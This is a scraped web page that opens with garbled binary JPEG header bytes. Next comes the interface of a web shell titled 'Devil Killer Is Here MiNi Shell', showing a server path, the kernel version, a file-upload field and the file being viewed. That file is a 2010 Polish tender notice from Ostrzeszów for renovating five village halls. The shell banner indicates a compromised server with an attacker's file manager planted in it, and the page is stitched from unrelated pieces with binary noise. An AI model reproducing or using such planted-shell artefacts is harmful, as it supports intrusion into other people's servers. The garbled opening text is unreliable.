JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100917/255035-N-2010.html

<p class="kh_header"><b>Ostrzeszów: Remont sal wiejskich w miejscowościach Bledzianów, Korpysy, Olszyna, Szklarka Myślniewska, Szklarka Przygodzicka</b><br>
<b>Numer ogłoszenia: 255035 - 2010; data zamieszczenia: 17.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Ostrzeszów , ul. Zamkowa 31, 63-500 Ostrzeszów, woj. wielkopolskie, tel. 062 7320600, faks 062 7320601.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrzeszow.nowoczesnagmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont sal wiejskich w miejscowościach Bledzianów, Korpysy, Olszyna, Szklarka Myślniewska, Szklarka Przygodzicka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest remont sal wiejskich w  miejscowościach Bledzianów, Korpysy, Olszyna, Szklarka Myślniewska, Szklarka Przygodzicka na terenie gminy Ostrzeszów.

2.	Zamówienie zostało podzielone na  pięć następujących części:
Część NR 1  -  Remont sali wiejskiej w Bledzianowie.
Kubatura budynku 1180,55 m3, pow. użytkowa 235,90 m2. Zamówienie obejmuje:
1)	remont dachu;
2)	remont podłogi;
3)	wymiana stolarki okiennej;
4)	malowanie pomieszczeń;
5)	montaż wentylacji mechanicznej;
6)	remont sufitu podwieszanego;
7)	wykonanie instalacji c.o.;
8)	wykonanie technologii kotłowni.

Część NR 2  -  Remont sali wiejskiej w Korpysach.
Kubatura budynku 1223,24 m3, pow. użytkowa 292,87 m2. Zamówienie obejmuje:
1)	remont i ocieplenie sufitu podwieszanego;
2)	klimatyzacja wewnętrzna sali;
3)	remont wnętrza sali;
4)	remont sanitariatów;
5)	remont zaplecza kuchennego i garażu;
6)	remont pieca;
7)	zakup wyposażenia;
8)	wykonanie wewnętrznych linii zasilających - WLZ, rozdzielnie i sterowanie GPW;
9)	wykonanie instalacji oświetlenia, gniazd wtyczkowych 230V oraz siły i sterowania;
10)	demontaż starej instalacji.

Część NR 3  -  Remont sali wiejskiej w Olszynie.
Kubatura budynku 1026,35 (1242,39 m3), pow. użytkowa 212,50 m2. Zamówienie obejmuje:
1)	roboty rozbiórkowe;
2)	podwyższenie budynku wraz z wylaniem wieńca żelbetonowego i trzpieni żelbetonowych w ścianach zewnętrznych;
3)	konstrukcja dachu z pokryciem i odwodnieniem;
4)	wykończenie wnętrza;
5)	wykonanie instalacji elektrycznej wraz z tablicą rozdzielczą;
6)	wykonanie pomiarów elektrycznych;
7)	demontaż starej instalacji.

Część NR 4  -  Remont sali wiejskiej w Szklarce Myślniewskiej.
Kubatura budynku 1417,5 m3, pow. użytkowa 343,99 m2. Zamówienie obejmuje:
1)	wymiana pokrycia dachu;
2)	remont i ocieplenie sufitu podwieszanego;
3)	remont wnętrza Sali;
4)	remont sanitariatów;
5)	remont zaplecza kuchni i Sali narad;
6)	remont pieca;
7)	remont garażu;
8)	montaż wentylatorów dachowych;
9)	wykonanie wewnętrznych linii zasilających - WLZ, rozdzielnie i sterowanie GPW;
10)	wykonanie instalacji oświetlenia, gniazd wtyczkowych 230V oraz siły i sterowania;
11)	demontaż starej instalacji;
12)	wykonanie instalacji c.o.;
13)	wykonanie technologii kotłowni.

Część NR 5  -  Remont sali wiejskiej w Szklarce Przygodzickiej.
Kubatura budynku 2021,70 m3, pow. użytkowa 419,49 m2. Zamówienie obejmuje:
1)	remont dachu;
2)	remont sufitu podwieszanego;
3)	malowanie pomieszczeń i stolarki drzwiowej;
4)	wykonanie wentylacji mechanicznej;
5)	remont podłogi;
6)	wykonanie wewnętrznych linii zasilających - WLZ, rozdzielnie i sterowanie GPW;
7)	wykonanie instalacji oświetlenia, gniazd wtyczkowych 230V oraz siły i sterowania;
8)	demontaż starej instalacji.

3.	Szczegółowy opis i zakres przedmiotu zamówienia określa dokumentacja projektowa, w tym przedmiar robót  ( załącznik nr 6.1 - 6.5. do specyfikacji istotnych warunków zamówienia zwanej dalej również specyfikacją), oraz specyfikacja techniczna wykonania i odbioru robót budowlanych ( załącznik nr 7.1. -7.5. do specyfikacji )..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy CZĘŚCI nr 1: Remont sali wiejskiej w Bledzianowie.
Wykonawca wskaże osoby, którymi dysponuje, i które będą uczestniczyć w wykonywaniu zamówienia pełniąc niżej wymienione funkcje, posiadające kwalifikacje zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie:
a)		kierownik robót budowlanych - osoba posiadająca  wymagane  Prawem Budowlanym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń;
b)	   	kierownik robót elektrycznych - osoba posiadająca  wymagane  Prawem Budowlanym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej, co najmniej w zakresie instalacji  i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń;
c)		kierownik robót sanitarnych - osoba posiadająca  wymagane  Prawem Budowlanym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej, co najmniej w zakresie instalacji  i urządzeń cieplnych, wentylacyjnych,  wodociągowych i kanalizacyjnych bez ograniczeń.

Dotyczy CZĘŚCI nr 2: Remont sali wiejskiej w Korpysach.
Wykonawca wskaże osoby, którymi dysponuje, i które będą uczestniczyć w wykonywaniu zamówienia pełniąc niżej wymienione funkcje, posiadające kwalifikacje zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie:
a)		kierownik robót budowlanych - osoba posiadająca  wymagane  Prawem Budowlanym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń;
b)   	kierownik robót elektrycznych - osoba posiadająca  wymagane  Prawem Budowlanym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej, co najmniej w zakresie instalacji  i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.

Dotyczy CZĘŚCI nr 3: Remont sali wiejskiej w Olszynie
Wykonawca wskaże osoby, którymi dysponuje, i które będą uczestniczyć w wykonywaniu zamówienia pełniąc niżej wymienione funkcje, posiadające kwalifikacje zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie:
a) 		kierownik budowy - osoba posiadająca  wymagane  Prawem Budowlanym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń;
b)   	kierownik robót elektrycznych - osoba posiadająca  wymagane  Prawem Budowlanym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej, co najmniej w zakresie instalacji  i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.

Dotyczy CZĘŚCI nr 4: Remont sali wiejskiej w Szklarce Myślniewskiej.
Wykonawca wskaże osoby, którymi dysponuje, i które będą uczestniczyć w wykonywaniu zamówienia pełniąc niżej wymienione funkcje, posiadające kwalifikacje zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie:
a)		kierownik robót budowlanych - osoba posiadająca  wymagane  Prawem Budowlanym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń;
b)		kierownik robót elektrycznych - osoba posiadająca  wymagane  Prawem Budowlanym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej, co najmniej w zakresie instalacji  i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń;
c)		kierownik robót sanitarnych - osoba posiadająca  wymagane  Prawem Budowlanym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej, co najmniej w zakresie instalacji  i urządzeń cieplnych, wentylacyjnych,  wodociągowych i kanalizacyjnych bez ograniczeń.

Dotyczy CZĘŚCI nr 5: Remont sali wiejskiej w Szklarce Przygodzickiej.
Wykonawca wskaże osoby, którymi dysponuje, i które będą uczestniczyć w wykonywaniu zamówienia pełniąc niżej wymienione funkcje, posiadające kwalifikacje zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie:
a)		kierownik robót budowlanych - osoba posiadająca  wymagane  Prawem Budowlanym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń;
b)		kierownik robót elektrycznych - osoba posiadająca  wymagane  Prawem Budowlanym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej, co najmniej w zakresie instalacji  i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.

U W A G A,   dotyczy wszystkich części zamówienia:  ilekroć Zamawiający wymaga określonych uprawień budowlanych, rozumie przez to uprawnienia   budowlane ( w tym przynależność - wpis na listę członków do właściwej Izby Samorządu Zawodowego) na podstawie ustawy - Prawo Budowlane lub odpowiadające im ważne uprawnienia  budowlane, odpowiednie do przedmiotu zamówienia, wydane na podstawie uprzednio obowiązujących przepisów prawa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o którym mowa w pkt. III.4.3.1.  zastępuje się je  dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;

2.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;

3.	W przypadku składania oferty wspólnej przez dwa lub więcej podmiotów wymagane jest pełnomocnictwo wykonawców wspólnie ubiegających się o udzielenie zamówienia dla podmiotu  uprawnionego do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu  i zawarcia umowy w sprawie zamówienia publicznego, podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów. ;

4.	W przypadku, o którym mowa w pkt. 3. wykonawca zobowiązany jest złożyć: wymagane od wykonawcy oświadczenia i dokumenty potwierdzające  brak podstaw do wykluczenia z postępowania o udzielenie zamówienia, składane oddzielnie przez każdego z wykonawców  wspólnie ubiegających się o udzielenie zamówienia.

5.	 Dokumenty składane są w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez  wykonawcę.

6.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w § 1 ust. 2 i 3 Rozporządzenia Prezesa Rady Ministrów z dnia  30 grudnia  2009 r. w sprawie   rodzajów dokumentów, jakie może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz.U. z 2009 r. Nr 226, poz. 1817 ), kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.

7.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany zawartej umowy mogą nastąpić w szczególności w przypadku: 
1)	wystąpienia okoliczności skutkujących potrzebą zmiany przedmiotu lub umówionego terminu wykonania zamówienia, lub terminów określonych w harmonogramie rzeczowo-finansowym robót:
a)  z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia, proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego;
b)     z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa;
c)   z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron umowy;
d)  z powodu okoliczności siły wyższej, np: 
- wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, których nie można było przewidzieć z pewnością, w szczególności zagrażających bezpośrednio życiu lub zdrowiu ludzi lub grożących powstaniem szkody o znacznych rozmiarach;
- wystąpienia niesprzyjających warunków atmosferycznych, np.: niskich temperatur lub ulewnych deszczy uniemożliwiających prowadzenie robót z zachowaniem wymogów technologicznych;	
2)	wystąpienia okoliczności skutkujących potrzebą uzasadnionej lub koniecznej zmiany harmonogramu rzeczowo-finansowego robót w zakresie rzeczowego wykonania lub finansowania zamówienia;
3)	wystąpienia okoliczności skutkujących potrzebą zmiany wynagrodzenia z powodu wystąpienia ustawowej zmiany stawki podatku od towarów i usług (VAT);
4)	wystąpią okoliczności skutkujące całkowitą rezygnacją z podwykonawstwa,
5)	wystąpienia konieczności zmiany osób, danych kontaktowych lub adresów stron wskazanych w niniejszej umowie, w szczególności:
a)  z powodu zdarzeń losowych wywołanych okolicznościami niemożliwymi do przewidzenia przed zawarciem umowy;
b)   z  powodu zmian kadrowych;
c) wystąpienia okoliczności skutkujących potrzebą zmian organizacyjnych stron, np. zmiana reprezentacji lub adresu siedziby strony umowy.

2.	Zmiany umowy, o których mowa w ust.3 mogą być wprowadzone  z zachowaniem następujących warunków: 

1)  wniosek o dokonanie zmiany umowy, zawierający uzasadnienie zmiany należy złożyć w formie pisemnej,
2)  ocenę zasadności zmiany  należy dokonać  po zapoznaniu się z uzasadnieniem i przy uwzględnieniu okoliczności sprawy,
3)  wszelkie zmiany umowy mogą być dokonywane z zachowaniem warunku, o którym mowa w ust.1.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ostrzeszow.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego, tj: Urząd Miasta i Gminy Ostrzeszów, ul.Zamkowa 31, 63-500 Ostrzeszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2010 godzina 11:00, miejsce: siedziba Zamawiającego, tj: Urząd Miasta i Gminy Ostrzeszów, ul.Zamkowa 31, 63-500 Ostrzeszów, pokój 64.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający złozył wniosek o dofinansowanie projektu ze środków Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich  na lata 2007-2013. 2. Opłata za specyfikację istotnych warunków zamówienia: 88,00 PLN. Warunki i sposób płatności: płatne w Kasie w siedzibie zamawiającego, tj. w Urzędzie Miasta i Gminy Ostrzeszów ul.Zamkowa 31, 63-500 Ostrzeszów, od poniedziałku do piątku (w dniach urzędowania) w godz: 08:00 - 14:00 lub za pobraniem pocztowym z doliczeniem kosztów przekazania. 3. W prowadzonym postępowaniu oświadczenia, wnioski, zawiadomienia oraz informacje zamawiający i wykonawcy przekazują pisemnie lub faksem. Jeżeli zamawiający lub wykonawca przekazują dokumenty lub informacje faksem, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. Osobą uprawnioną do porozumiewania się z wykonawcami jest: a) Sławomir Czemplik, Anna Madeja-Dejneka   - w sprawach dotyczących przedmiotu zamówienia, b) Marek Kurzawa, Anna Madeja-Dejneka - w sprawach dotyczących procedury przetargowej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont sali wiejskiej w Bledzianowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kubatura budynku 1180,55 m3, pow. użytkowa 235,90 m2. Zamówienie obejmuje:
1)	remont dachu;
2)	remont podłogi;
3)	wymiana stolarki okiennej;
4)	malowanie pomieszczeń;
5)	montaż wentylacji mechanicznej;
6)	remont sufitu podwieszanego;
7)	wykonanie instalacji c.o.;
8)	wykonanie technologii kotłowni.
Szczegółowy opis i zakres przedmiotu zamówienia określa dokumentacja projektowa, w tym przedmiar robót  ( załącznik nr 6.1. do specyfikacji ), oraz specyfikacja techniczna wykonania i odbioru robót budowlanych ( załącznik nr 7.1.  do specyfikacji )..</p></li>
